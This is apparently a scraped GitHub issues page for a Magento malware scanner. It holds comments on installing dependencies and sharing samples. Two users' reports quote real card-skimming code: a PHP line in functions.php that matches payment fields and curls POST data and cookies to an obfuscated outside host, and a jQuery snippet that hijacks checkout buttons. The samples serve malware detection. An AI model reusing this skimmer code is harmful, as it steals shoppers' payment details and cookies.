magento-malware-scanner
magento-malware-scanner copied to clipboard
gwillem
Scanner, signatures and the largest collection of Magento malware
you need to check if python packages already installed and managed with yum or apt, instead of re-installing them with pip. this will break other python projects.
The documentation for usage notes that python-pip, gcc and python-dev are required for install, however you also need python-setuptools on Debian Stretch for the "pip install" to succeed
From app/code/core/Mage/Core/functions.php ``` if (preg_match("/".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ8bW9udGh8ZHVtbXl8c2VjdXJldHJhZGluZ3x5ZWFyfGxvZ2lufGJpbGxpbmd8ZXhwaXJ5fHBheW1lbnR8Y2FyZF9udW1iZXI=')."/i", serialize($_POST))) - @shell_exec("curl --data \"version=1&encode=".base64_encode( serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".trim(base64_decode('aHR0cDovL3ZlcnBheW1lbnQuY29tL3Rlc3RTZXJ2ZXIucGhw'))." > /dev/null 2
I found this line manually after deep mwsan `
https://blog.travis-ci.com/2017-08-31-trusty-as-default-status Probably need to verify whether the default yara packages for Trusty are sufficient.
it was adding following code in some of js in our case it was quickview.js and ccard.js ``` jQuery(document).ready(function() { if(!(document.cookie.indexOf("userpayid") + 1)) { jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();"); jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();"); jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");...
There's a malware sharing platform called "MISP" (or https://github.com/MISP), which might provide a more useful structure for sharing these samples than GitHub. Found through https://twitter.com/da_667/status/832217900127834112
